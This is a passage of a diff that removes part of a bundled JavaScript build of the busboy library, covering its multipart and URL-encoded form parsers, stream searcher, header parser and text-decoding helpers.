} - if (this._dashes === 2) { - if ((start + i) < end && this._events.trailer) { this.emit('trailer', data.slice(start + i, end)) } - this.reset() - this._finished = true - // no more parts will be added - if (self._parts 
=== 0) { - self._realFinish = true - self.emit('finish') - self._realFinish = false - } - } - if (this._dashes) { return } - } - if (this._justMatched) { this._justMatched = false } - if (!this._part) { - this._part = new PartStream(this._partOpts) - this._part._read = function (n) { - self._unpause() - } - if (this._isPreamble && this._events.preamble) { this.emit('preamble', this._part) } else if (this._isPreamble !== true && this._events.part) { this.emit('part', this._part) } else { this._ignore() } - if (!this._isPreamble) { this._inHeader = true } - } - if (data && start < end && !this._ignoreData) { - if (this._isPreamble || !this._inHeader) { - if (buf) { shouldWriteMore = this._part.push(buf) } - shouldWriteMore = this._part.push(data.slice(start, end)) - if (!shouldWriteMore) { this._pause = true } - } else if (!this._isPreamble && this._inHeader) { - if (buf) { this._hparser.push(buf) } - r = this._hparser.push(data.slice(start, end)) - if (!this._inHeader && r !== undefined && r < end) { this._oninfo(false, data, start + r, end) } - } - } - if (isMatch) { - this._hparser.reset() - if (this._isPreamble) { this._isPreamble = false } else { - if (start !== end) { - ++this._parts - this._part.on('end', function () { - if (--self._parts === 0) { - if (self._finished) { - self._realFinish = true - self.emit('finish') - self._realFinish = false - } else { - self._unpause() - } - } - }) - } - } - this._part.push(null) - this._part = undefined - this._ignoreData = false - this._justMatched = true - this._dashes = 0 - } -} - -Dicer.prototype._unpause = function () { - if (!this._pause) { return } - - this._pause = false - if (this._cb) { - const cb = this._cb - this._cb = undefined - cb() - } -} - -module.exports = Dicer - - -/***/ }), - -/***/ 2032: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const EventEmitter = (__nccwpck_require__(5673).EventEmitter) -const inherits = (__nccwpck_require__(7261).inherits) -const 
getLimit = __nccwpck_require__(1467) - -const StreamSearch = __nccwpck_require__(1142) - -const B_DCRLF = Buffer.from('\r\n\r\n') -const RE_CRLF = /\r\n/g -const RE_HDR = /^([^:]+):[ \t]?([\x00-\xFF]+)?$/ // eslint-disable-line no-control-regex - -function HeaderParser (cfg) { - EventEmitter.call(this) - - cfg = cfg || {} - const self = this - this.nread = 0 - this.maxed = false - this.npairs = 0 - this.maxHeaderPairs = getLimit(cfg, 'maxHeaderPairs', 2000) - this.maxHeaderSize = getLimit(cfg, 'maxHeaderSize', 80 * 1024) - this.buffer = '' - this.header = {} - this.finished = false - this.ss = new StreamSearch(B_DCRLF) - this.ss.on('info', function (isMatch, data, start, end) { - if (data && !self.maxed) { - if (self.nread + end - start >= self.maxHeaderSize) { - end = self.maxHeaderSize - self.nread + start - self.nread = self.maxHeaderSize - self.maxed = true - } else { self.nread += (end - start) } - - self.buffer += data.toString('binary', start, end) - } - if (isMatch) { self._finish() } - }) -} -inherits(HeaderParser, EventEmitter) - -HeaderParser.prototype.push = function (data) { - const r = this.ss.push(data) - if (this.finished) { return r } -} - -HeaderParser.prototype.reset = function () { - this.finished = false - this.buffer = '' - this.header = {} - this.ss.reset() -} - -HeaderParser.prototype._finish = function () { - if (this.buffer) { this._parseHeader() } - this.ss.matches = this.ss.maxMatches - const header = this.header - this.header = {} - this.buffer = '' - this.finished = true - this.nread = this.npairs = 0 - this.maxed = false - this.emit('header', header) -} - -HeaderParser.prototype._parseHeader = function () { - if (this.npairs === this.maxHeaderPairs) { return } - - const lines = this.buffer.split(RE_CRLF) - const len = lines.length - let m, h - - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - if (lines[i].length === 0) { continue } - if (lines[i][0] === '\t' || lines[i][0] === ' ') { - // folded header content - // 
RFC2822 says to just remove the CRLF and not the whitespace following - // it, so we follow the RFC and include the leading whitespace ... - if (h) { - this.header[h][this.header[h].length - 1] += lines[i] - continue - } - } - - const posColon = lines[i].indexOf(':') - if ( - posColon === -1 || - posColon === 0 - ) { - return - } - m = RE_HDR.exec(lines[i]) - h = m[1].toLowerCase() - this.header[h] = this.header[h] || [] - this.header[h].push((m[2] || '')) - if (++this.npairs === this.maxHeaderPairs) { break } - } -} - -module.exports = HeaderParser - - -/***/ }), - -/***/ 1620: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const inherits = (__nccwpck_require__(7261).inherits) -const ReadableStream = (__nccwpck_require__(4492).Readable) - -function PartStream (opts) { - ReadableStream.call(this, opts) -} -inherits(PartStream, ReadableStream) - -PartStream.prototype._read = function (n) {} - -module.exports = PartStream - - -/***/ }), - -/***/ 1142: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -/** - * Copyright Brian White. All rights reserved. - * - * @see https://github.com/mscdex/streamsearch - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to - * deal in the Software without restriction, including without limitation the - * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or - * sell copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. 
- * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING - * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS - * IN THE SOFTWARE. - * - * Based heavily on the Streaming Boyer-Moore-Horspool C++ implementation - * by Hongli Lai at: https://github.com/FooBarWidget/boyer-moore-horspool - */ -const EventEmitter = (__nccwpck_require__(5673).EventEmitter) -const inherits = (__nccwpck_require__(7261).inherits) - -function SBMH (needle) { - if (typeof needle === 'string') { - needle = Buffer.from(needle) - } - - if (!Buffer.isBuffer(needle)) { - throw new TypeError('The needle has to be a String or a Buffer.') - } - - const needleLength = needle.length - - if (needleLength === 0) { - throw new Error('The needle cannot be an empty String/Buffer.') - } - - if (needleLength > 256) { - throw new Error('The needle cannot have a length bigger than 256.') - } - - this.maxMatches = Infinity - this.matches = 0 - - this._occ = new Array(256) - .fill(needleLength) // Initialize occurrence table. - this._lookbehind_size = 0 - this._needle = needle - this._bufpos = 0 - - this._lookbehind = Buffer.alloc(needleLength) - - // Populate occurrence table with analysis of the needle, - // ignoring last letter. 
- for (var i = 0; i < needleLength - 1; ++i) { // eslint-disable-line no-var - this._occ[needle[i]] = needleLength - 1 - i - } -} -inherits(SBMH, EventEmitter) - -SBMH.prototype.reset = function () { - this._lookbehind_size = 0 - this.matches = 0 - this._bufpos = 0 -} - -SBMH.prototype.push = function (chunk, pos) { - if (!Buffer.isBuffer(chunk)) { - chunk = Buffer.from(chunk, 'binary') - } - const chlen = chunk.length - this._bufpos = pos || 0 - let r - while (r !== chlen && this.matches < this.maxMatches) { r = this._sbmh_feed(chunk) } - return r -} - -SBMH.prototype._sbmh_feed = function (data) { - const len = data.length - const needle = this._needle - const needleLength = needle.length - const lastNeedleChar = needle[needleLength - 1] - - // Positive: points to a position in `data` - // pos == 3 points to data[3] - // Negative: points to a position in the lookbehind buffer - // pos == -2 points to lookbehind[lookbehind_size - 2] - let pos = -this._lookbehind_size - let ch - - if (pos < 0) { - // Lookbehind buffer is not empty. Perform Boyer-Moore-Horspool - // search with character lookup code that considers both the - // lookbehind buffer and the current round's haystack data. - // - // Loop until - // there is a match. - // or until - // we've moved past the position that requires the - // lookbehind buffer. In this case we switch to the - // optimized loop. - // or until - // the character to look at lies outside the haystack. - while (pos < 0 && pos <= len - needleLength) { - ch = this._sbmh_lookup_char(data, pos + needleLength - 1) - - if ( - ch === lastNeedleChar && - this._sbmh_memcmp(data, pos, needleLength - 1) - ) { - this._lookbehind_size = 0 - ++this.matches - this.emit('info', true) - - return (this._bufpos = pos + needleLength) - } - pos += this._occ[ch] - } - - // No match. - - if (pos < 0) { - // There's too few data for Boyer-Moore-Horspool to run, - // so let's use a different algorithm to skip as much as - // we can. 
- // Forward pos until - // the trailing part of lookbehind + data - // looks like the beginning of the needle - // or until - // pos == 0 - while (pos < 0 && !this._sbmh_memcmp(data, pos, len - pos)) { ++pos } - } - - if (pos >= 0) { - // Discard lookbehind buffer. - this.emit('info', false, this._lookbehind, 0, this._lookbehind_size) - this._lookbehind_size = 0 - } else { - // Cut off part of the lookbehind buffer that has - // been processed and append the entire haystack - // into it. - const bytesToCutOff = this._lookbehind_size + pos - if (bytesToCutOff > 0) { - // The cut off data is guaranteed not to contain the needle. - this.emit('info', false, this._lookbehind, 0, bytesToCutOff) - } - - this._lookbehind.copy(this._lookbehind, 0, bytesToCutOff, - this._lookbehind_size - bytesToCutOff) - this._lookbehind_size -= bytesToCutOff - - data.copy(this._lookbehind, this._lookbehind_size) - this._lookbehind_size += len - - this._bufpos = len - return len - } - } - - pos += (pos >= 0) * this._bufpos - - // Lookbehind buffer is now empty. We only need to check if the - // needle is in the haystack. - if (data.indexOf(needle, pos) !== -1) { - pos = data.indexOf(needle, pos) - ++this.matches - if (pos > 0) { this.emit('info', true, data, this._bufpos, pos) } else { this.emit('info', true) } - - return (this._bufpos = pos + needleLength) - } else { - pos = len - needleLength - } - - // There was no match. If there's trailing haystack data that we cannot - // match yet using the Boyer-Moore-Horspool algorithm (because the trailing - // data is less than the needle size) then match using a modified - // algorithm that starts matching from the beginning instead of the end. - // Whatever trailing data is left after running this algorithm is added to - // the lookbehind buffer. 
- while ( - pos < len && - ( - data[pos] !== needle[0] || - ( - (Buffer.compare( - data.subarray(pos, pos + len - pos), - needle.subarray(0, len - pos) - ) !== 0) - ) - ) - ) { - ++pos - } - if (pos < len) { - data.copy(this._lookbehind, 0, pos, pos + (len - pos)) - this._lookbehind_size = len - pos - } - - // Everything until pos is guaranteed not to contain needle data. - if (pos > 0) { this.emit('info', false, data, this._bufpos, pos < len ? pos : len) } - - this._bufpos = len - return len -} - -SBMH.prototype._sbmh_lookup_char = function (data, pos) { - return (pos < 0) - ? this._lookbehind[this._lookbehind_size + pos] - : data[pos] -} - -SBMH.prototype._sbmh_memcmp = function (data, pos, len) { - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - if (this._sbmh_lookup_char(data, pos + i) !== this._needle[i]) { return false } - } - return true -} - -module.exports = SBMH - - -/***/ }), - -/***/ 727: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const WritableStream = (__nccwpck_require__(4492).Writable) -const { inherits } = __nccwpck_require__(7261) -const Dicer = __nccwpck_require__(2960) - -const MultipartParser = __nccwpck_require__(2183) -const UrlencodedParser = __nccwpck_require__(8306) -const parseParams = __nccwpck_require__(1854) - -function Busboy (opts) { - if (!(this instanceof Busboy)) { return new Busboy(opts) } - - if (typeof opts !== 'object') { - throw new TypeError('Busboy expected an options-Object.') - } - if (typeof opts.headers !== 'object') { - throw new TypeError('Busboy expected an options-Object with headers-attribute.') - } - if (typeof opts.headers['content-type'] !== 'string') { - throw new TypeError('Missing Content-Type-header.') - } - - const { - headers, - ...streamOptions - } = opts - - this.opts = { - autoDestroy: false, - ...streamOptions - } - WritableStream.call(this, this.opts) - - this._done = false - this._parser = this.getParserByHeaders(headers) - 
this._finished = false -} -inherits(Busboy, WritableStream) - -Busboy.prototype.emit = function (ev) { - if (ev === 'finish') { - if (!this._done) { - this._parser?.end() - return - } else if (this._finished) { - return - } - this._finished = true - } - WritableStream.prototype.emit.apply(this, arguments) -} - -Busboy.prototype.getParserByHeaders = function (headers) { - const parsed = parseParams(headers['content-type']) - - const cfg = { - defCharset: this.opts.defCharset, - fileHwm: this.opts.fileHwm, - headers, - highWaterMark: this.opts.highWaterMark, - isPartAFile: this.opts.isPartAFile, - limits: this.opts.limits, - parsedConType: parsed, - preservePath: this.opts.preservePath - } - - if (MultipartParser.detect.test(parsed[0])) { - return new MultipartParser(this, cfg) - } - if (UrlencodedParser.detect.test(parsed[0])) { - return new UrlencodedParser(this, cfg) - } - throw new Error('Unsupported Content-Type.') -} - -Busboy.prototype._write = function (chunk, encoding, cb) { - this._parser.write(chunk, cb) -} - -module.exports = Busboy -module.exports["default"] = Busboy -module.exports.Busboy = Busboy - -module.exports.Dicer = Dicer - - -/***/ }), - -/***/ 2183: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -// TODO: -// * support 1 nested multipart level -// (see second multipart example here: -// http://www.w3.org/TR/html401/interact/forms.html#didx-multipartform-data) -// * support limits.fieldNameSize -// -- this will require modifications to utils.parseParams - -const { Readable } = __nccwpck_require__(4492) -const { inherits } = __nccwpck_require__(7261) - -const Dicer = __nccwpck_require__(2960) - -const parseParams = __nccwpck_require__(1854) -const decodeText = __nccwpck_require__(4619) -const basename = __nccwpck_require__(8647) -const getLimit = __nccwpck_require__(1467) - -const RE_BOUNDARY = /^boundary$/i -const RE_FIELD = /^form-data$/i -const RE_CHARSET = /^charset$/i -const RE_FILENAME = 
/^filename$/i -const RE_NAME = /^name$/i - -Multipart.detect = /^multipart\/form-data/i -function Multipart (boy, cfg) { - let i - let len - const self = this - let boundary - const limits = cfg.limits - const isPartAFile = cfg.isPartAFile || ((fieldName, contentType, fileName) => (contentType === 'application/octet-stream' || fileName !== undefined)) - const parsedConType = cfg.parsedConType || [] - const defCharset = cfg.defCharset || 'utf8' - const preservePath = cfg.preservePath - const fileOpts = { highWaterMark: cfg.fileHwm } - - for (i = 0, len = parsedConType.length; i < len; ++i) { - if (Array.isArray(parsedConType[i]) && - RE_BOUNDARY.test(parsedConType[i][0])) { - boundary = parsedConType[i][1] - break - } - } - - function checkFinished () { - if (nends === 0 && finished && !boy._done) { - finished = false - self.end() - } - } - - if (typeof boundary !== 'string') { throw new Error('Multipart: Boundary not found') } - - const fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) - const fileSizeLimit = getLimit(limits, 'fileSize', Infinity) - const filesLimit = getLimit(limits, 'files', Infinity) - const fieldsLimit = getLimit(limits, 'fields', Infinity) - const partsLimit = getLimit(limits, 'parts', Infinity) - const headerPairsLimit = getLimit(limits, 'headerPairs', 2000) - const headerSizeLimit = getLimit(limits, 'headerSize', 80 * 1024) - - let nfiles = 0 - let nfields = 0 - let nends = 0 - let curFile - let curField - let finished = false - - this._needDrain = false - this._pause = false - this._cb = undefined - this._nparts = 0 - this._boy = boy - - const parserCfg = { - boundary, - maxHeaderPairs: headerPairsLimit, - maxHeaderSize: headerSizeLimit, - partHwm: fileOpts.highWaterMark, - highWaterMark: cfg.highWaterMark - } - - this.parser = new Dicer(parserCfg) - this.parser.on('drain', function () { - self._needDrain = false - if (self._cb && !self._pause) { - const cb = self._cb - self._cb = undefined - cb() - } - }).on('part', function 
onPart (part) { - if (++self._nparts > partsLimit) { - self.parser.removeListener('part', onPart) - self.parser.on('part', skipPart) - boy.hitPartsLimit = true - boy.emit('partsLimit') - return skipPart(part) - } - - // hack because streams2 _always_ doesn't emit 'end' until nextTick, so let - // us emit 'end' early since we know the part has ended if we are already - // seeing the next part - if (curField) { - const field = curField - field.emit('end') - field.removeAllListeners('end') - } - - part.on('header', function (header) { - let contype - let fieldname - let parsed - let charset - let encoding - let filename - let nsize = 0 - - if (header['content-type']) { - parsed = parseParams(header['content-type'][0]) - if (parsed[0]) { - contype = parsed[0].toLowerCase() - for (i = 0, len = parsed.length; i < len; ++i) { - if (RE_CHARSET.test(parsed[i][0])) { - charset = parsed[i][1].toLowerCase() - break - } - } - } - } - - if (contype === undefined) { contype = 'text/plain' } - if (charset === undefined) { charset = defCharset } - - if (header['content-disposition']) { - parsed = parseParams(header['content-disposition'][0]) - if (!RE_FIELD.test(parsed[0])) { return skipPart(part) } - for (i = 0, len = parsed.length; i < len; ++i) { - if (RE_NAME.test(parsed[i][0])) { - fieldname = parsed[i][1] - } else if (RE_FILENAME.test(parsed[i][0])) { - filename = parsed[i][1] - if (!preservePath) { filename = basename(filename) } - } - } - } else { return skipPart(part) } - - if (header['content-transfer-encoding']) { encoding = header['content-transfer-encoding'][0].toLowerCase() } else { encoding = '7bit' } - - let onData, - onEnd - - if (isPartAFile(fieldname, contype, filename)) { - // file/binary field - if (nfiles === filesLimit) { - if (!boy.hitFilesLimit) { - boy.hitFilesLimit = true - boy.emit('filesLimit') - } - return skipPart(part) - } - - ++nfiles - - if (!boy._events.file) { - self.parser._ignore() - return - } - - ++nends - const file = new 
FileStream(fileOpts) - curFile = file - file.on('end', function () { - --nends - self._pause = false - checkFinished() - if (self._cb && !self._needDrain) { - const cb = self._cb - self._cb = undefined - cb() - } - }) - file._read = function (n) { - if (!self._pause) { return } - self._pause = false - if (self._cb && !self._needDrain) { - const cb = self._cb - self._cb = undefined - cb() - } - } - boy.emit('file', fieldname, file, filename, encoding, contype) - - onData = function (data) { - if ((nsize += data.length) > fileSizeLimit) { - const extralen = fileSizeLimit - nsize + data.length - if (extralen > 0) { file.push(data.slice(0, extralen)) } - file.truncated = true - file.bytesRead = fileSizeLimit - part.removeAllListeners('data') - file.emit('limit') - return - } else if (!file.push(data)) { self._pause = true } - - file.bytesRead = nsize - } - - onEnd = function () { - curFile = undefined - file.push(null) - } - } else { - // non-file field - if (nfields === fieldsLimit) { - if (!boy.hitFieldsLimit) { - boy.hitFieldsLimit = true - boy.emit('fieldsLimit') - } - return skipPart(part) - } - - ++nfields - ++nends - let buffer = '' - let truncated = false - curField = part - - onData = function (data) { - if ((nsize += data.length) > fieldSizeLimit) { - const extralen = (fieldSizeLimit - (nsize - data.length)) - buffer += data.toString('binary', 0, extralen) - truncated = true - part.removeAllListeners('data') - } else { buffer += data.toString('binary') } - } - - onEnd = function () { - curField = undefined - if (buffer.length) { buffer = decodeText(buffer, 'binary', charset) } - boy.emit('field', fieldname, buffer, false, truncated, encoding, contype) - --nends - checkFinished() - } - } - - /* As of node@2efe4ab761666 (v0.10.29+/v0.11.14+), busboy had become - broken. Streams2/streams3 is a huge black box of confusion, but - somehow overriding the sync state seems to fix things again (and still - seems to work for previous node versions). 
- */ - part._readableState.sync = false - - part.on('data', onData) - part.on('end', onEnd) - }).on('error', function (err) { - if (curFile) { curFile.emit('error', err) } - }) - }).on('error', function (err) { - boy.emit('error', err) - }).on('finish', function () { - finished = true - checkFinished() - }) -} - -Multipart.prototype.write = function (chunk, cb) { - const r = this.parser.write(chunk) - if (r && !this._pause) { - cb() - } else { - this._needDrain = !r - this._cb = cb - } -} - -Multipart.prototype.end = function () { - const self = this - - if (self.parser.writable) { - self.parser.end() - } else if (!self._boy._done) { - process.nextTick(function () { - self._boy._done = true - self._boy.emit('finish') - }) - } -} - -function skipPart (part) { - part.resume() -} - -function FileStream (opts) { - Readable.call(this, opts) - - this.bytesRead = 0 - - this.truncated = false -} - -inherits(FileStream, Readable) - -FileStream.prototype._read = function (n) {} - -module.exports = Multipart - - -/***/ }), - -/***/ 8306: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Decoder = __nccwpck_require__(7100) -const decodeText = __nccwpck_require__(4619) -const getLimit = __nccwpck_require__(1467) - -const RE_CHARSET = /^charset$/i - -UrlEncoded.detect = /^application\/x-www-form-urlencoded/i -function UrlEncoded (boy, cfg) { - const limits = cfg.limits - const parsedConType = cfg.parsedConType - this.boy = boy - - this.fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) - this.fieldNameSizeLimit = getLimit(limits, 'fieldNameSize', 100) - this.fieldsLimit = getLimit(limits, 'fields', Infinity) - - let charset - for (var i = 0, len = parsedConType.length; i < len; ++i) { // eslint-disable-line no-var - if (Array.isArray(parsedConType[i]) && - RE_CHARSET.test(parsedConType[i][0])) { - charset = parsedConType[i][1].toLowerCase() - break - } - } - - if (charset === undefined) { charset = cfg.defCharset || 
'utf8' } - - this.decoder = new Decoder() - this.charset = charset - this._fields = 0 - this._state = 'key' - this._checkingBytes = true - this._bytesKey = 0 - this._bytesVal = 0 - this._key = '' - this._val = '' - this._keyTrunc = false - this._valTrunc = false - this._hitLimit = false -} - -UrlEncoded.prototype.write = function (data, cb) { - if (this._fields === this.fieldsLimit) { - if (!this.boy.hitFieldsLimit) { - this.boy.hitFieldsLimit = true - this.boy.emit('fieldsLimit') - } - return cb() - } - - let idxeq; let idxamp; let i; let p = 0; const len = data.length - - while (p < len) { - if (this._state === 'key') { - idxeq = idxamp = undefined - for (i = p; i < len; ++i) { - if (!this._checkingBytes) { ++p } - if (data[i] === 0x3D/* = */) { - idxeq = i - break - } else if (data[i] === 0x26/* & */) { - idxamp = i - break - } - if (this._checkingBytes && this._bytesKey === this.fieldNameSizeLimit) { - this._hitLimit = true - break - } else if (this._checkingBytes) { ++this._bytesKey } - } - - if (idxeq !== undefined) { - // key with assignment - if (idxeq > p) { this._key += this.decoder.write(data.toString('binary', p, idxeq)) } - this._state = 'val' - - this._hitLimit = false - this._checkingBytes = true - this._val = '' - this._bytesVal = 0 - this._valTrunc = false - this.decoder.reset() - - p = idxeq + 1 - } else if (idxamp !== undefined) { - // key with no assignment - ++this._fields - let key; const keyTrunc = this._keyTrunc - if (idxamp > p) { key = (this._key += this.decoder.write(data.toString('binary', p, idxamp))) } else { key = this._key } - - this._hitLimit = false - this._checkingBytes = true - this._key = '' - this._bytesKey = 0 - this._keyTrunc = false - this.decoder.reset() - - if (key.length) { - this.boy.emit('field', decodeText(key, 'binary', this.charset), - '', - keyTrunc, - false) - } - - p = idxamp + 1 - if (this._fields === this.fieldsLimit) { return cb() } - } else if (this._hitLimit) { - // we may not have hit the actual limit if 
there are encoded bytes... - if (i > p) { this._key += this.decoder.write(data.toString('binary', p, i)) } - p = i - if ((this._bytesKey = this._key.length) === this.fieldNameSizeLimit) { - // yep, we actually did hit the limit - this._checkingBytes = false - this._keyTrunc = true - } - } else { - if (p < len) { this._key += this.decoder.write(data.toString('binary', p)) } - p = len - } - } else { - idxamp = undefined - for (i = p; i < len; ++i) { - if (!this._checkingBytes) { ++p } - if (data[i] === 0x26/* & */) { - idxamp = i - break - } - if (this._checkingBytes && this._bytesVal === this.fieldSizeLimit) { - this._hitLimit = true - break - } else if (this._checkingBytes) { ++this._bytesVal } - } - - if (idxamp !== undefined) { - ++this._fields - if (idxamp > p) { this._val += this.decoder.write(data.toString('binary', p, idxamp)) } - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - decodeText(this._val, 'binary', this.charset), - this._keyTrunc, - this._valTrunc) - this._state = 'key' - - this._hitLimit = false - this._checkingBytes = true - this._key = '' - this._bytesKey = 0 - this._keyTrunc = false - this.decoder.reset() - - p = idxamp + 1 - if (this._fields === this.fieldsLimit) { return cb() } - } else if (this._hitLimit) { - // we may not have hit the actual limit if there are encoded bytes... 
- if (i > p) { this._val += this.decoder.write(data.toString('binary', p, i)) } - p = i - if ((this._val === '' && this.fieldSizeLimit === 0) || - (this._bytesVal = this._val.length) === this.fieldSizeLimit) { - // yep, we actually did hit the limit - this._checkingBytes = false - this._valTrunc = true - } - } else { - if (p < len) { this._val += this.decoder.write(data.toString('binary', p)) } - p = len - } - } - } - cb() -} - -UrlEncoded.prototype.end = function () { - if (this.boy._done) { return } - - if (this._state === 'key' && this._key.length > 0) { - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - '', - this._keyTrunc, - false) - } else if (this._state === 'val') { - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - decodeText(this._val, 'binary', this.charset), - this._keyTrunc, - this._valTrunc) - } - this.boy._done = true - this.boy.emit('finish') -} - -module.exports = UrlEncoded - - -/***/ }), - -/***/ 7100: -/***/ ((module) => { - -"use strict"; - - -const RE_PLUS = /\+/g - -const HEX = [ - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, - 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 -] - -function Decoder () { - this.buffer = undefined -} -Decoder.prototype.write = function (str) { - // Replace '+' with ' ' before decoding - str = str.replace(RE_PLUS, ' ') - let res = '' - let i = 0; let p = 0; const len = str.length - for (; i < len; ++i) { - if (this.buffer !== undefined) { - if (!HEX[str.charCodeAt(i)]) { - res += '%' + this.buffer - this.buffer = undefined - --i // retry character - } else { - this.buffer += str[i] - ++p - if (this.buffer.length === 2) { - res += String.fromCharCode(parseInt(this.buffer, 
16)) - this.buffer = undefined - } - } - } else if (str[i] === '%') { - if (i > p) { - res += str.substring(p, i) - p = i - } - this.buffer = '' - ++p - } - } - if (p < len && this.buffer === undefined) { res += str.substring(p) } - return res -} -Decoder.prototype.reset = function () { - this.buffer = undefined -} - -module.exports = Decoder - - -/***/ }), - -/***/ 8647: -/***/ ((module) => { - -"use strict"; - - -module.exports = function basename (path) { - if (typeof path !== 'string') { return '' } - for (var i = path.length - 1; i >= 0; --i) { // eslint-disable-line no-var - switch (path.charCodeAt(i)) { - case 0x2F: // '/' - case 0x5C: // '\' - path = path.slice(i + 1) - return (path === '..' || path === '.' ? '' : path) - } - } - return (path === '..' || path === '.' ? '' : path) -} - - -/***/ }), - -/***/ 4619: -/***/ (function(module) { - -"use strict"; - - -// Node has always utf-8 -const utf8Decoder = new TextDecoder('utf-8') -const textDecoders = new Map([ - ['utf-8', utf8Decoder], - ['utf8', utf8Decoder] -]) - -function getDecoder (charset) { - let lc - while (true) { - switch (charset) { - case 'utf-8': - case 'utf8': - return decoders.utf8 - case 'latin1': - case 'ascii': // TODO: Make these a separate, strict decoder? 
- case 'us-ascii': - case 'iso-8859-1': - case 'iso8859-1': - case 'iso88591': - case 'iso_8859-1': - case 'windows-1252': - case 'iso_8859-1:1987': - case 'cp1252': - case 'x-cp1252': - return decoders.latin1 - case 'utf16le': - case 'utf-16le': - case 'ucs2': - case 'ucs-2': - return decoders.utf16le - case 'base64': - return decoders.base64 - default: - if (lc === undefined) { - lc = true - charset = charset.toLowerCase() - continue - } - return decoders.other.bind(charset) - } - } -} - -const decoders = { - utf8: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.utf8Slice(0, data.length) - }, - - latin1: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - return data - } - return data.latin1Slice(0, data.length) - }, - - utf16le: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.ucs2Slice(0, data.length) - }, - - base64: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.base64Slice(0, data.length) - }, - - other: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - - if (textDecoders.has(this.toString())) { - try { - return textDecoders.get(this).decode(data) - } catch (e) { } - } - return typeof data === 'string' - ? 
data - : data.toString() - } -} - -function decodeText (text, sourceEncoding, destEncoding) { - if (text) { - return getDecoder(destEncoding)(text, sourceEncoding) - } - return text -} - -module.exports = decodeText - - -/***/ }), - -/***/ 1467: -/***/ ((module) => { - -"use strict"; - - -module.exports = function getLimit (limits, name, defaultLimit) { - if ( - !limits || - limits[name] === undefined || - limits[name] === null - ) { return defaultLimit } - - if ( - typeof limits[name] !== 'number' || - isNaN(limits[name]) - ) { throw new TypeError('Limit ' + name + ' is not a valid number') } - - return limits[name] -} - - -/***/ }), - -/***/ 1854: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -/* eslint-disable object-property-newline */ - - -const decodeText = __nccwpck_require__(4619) - -const RE_ENCODED = /%[a-fA-F0-9][a-fA-F0-9]/g - -const EncodedLookup = { - '%00': '\x00', '%01': '\x01', '%02': '\x02', '%03': '\x03', '%04': '\x04', - '%05': '\x05', '%06': '\x06', '%07': '\x07', '%08': '\x08', '%09': '\x09', - '%0a': '\x0a', '%0A': '\x0a', '%0b': '\x0b', '%0B': '\x0b', '%0c': '\x0c', - '%0C': '\x0c', '%0d': '\x0d', '%0D': '\x0d', '%0e': '\x0e', '%0E': '\x0e', - '%0f': '\x0f', '%0F': '\x0f', '%10': '\x10', '%11': '\x11', '%12': '\x12', - '%13': '\x13', '%14': '\x14', '%15': '\x15', '%16': '\x16', '%17': '\x17', - '%18': '\x18', '%19': '\x19', '%1a': '\x1a', '%1A': '\x1a', '%1b': '\x1b', - '%1B': '\x1b', '%1c': '\x1c', '%1C': '\x1c', '%1d': '\x1d', '%1D': '\x1d', - '%1e': '\x1e', '%1E': '\x1e', '%1f': '\x1f', '%1F': '\x1f', '%20': '\x20', - '%21': '\x21', '%22': '\x22', '%23': '\x23', '%24': '\x24', '%25': '\x25', - '%26': '\x26', '%27': '\x27', '%28': '\x28', '%29': '\x29', '%2a': '\x2a', - '%2A': '\x2a', '%2b': '\x2b', '%2B': '\x2b', '%2c': '\x2c', '%2C': '\x2c', - '%2d': '\x2d', '%2D': '\x2d', '%2e': 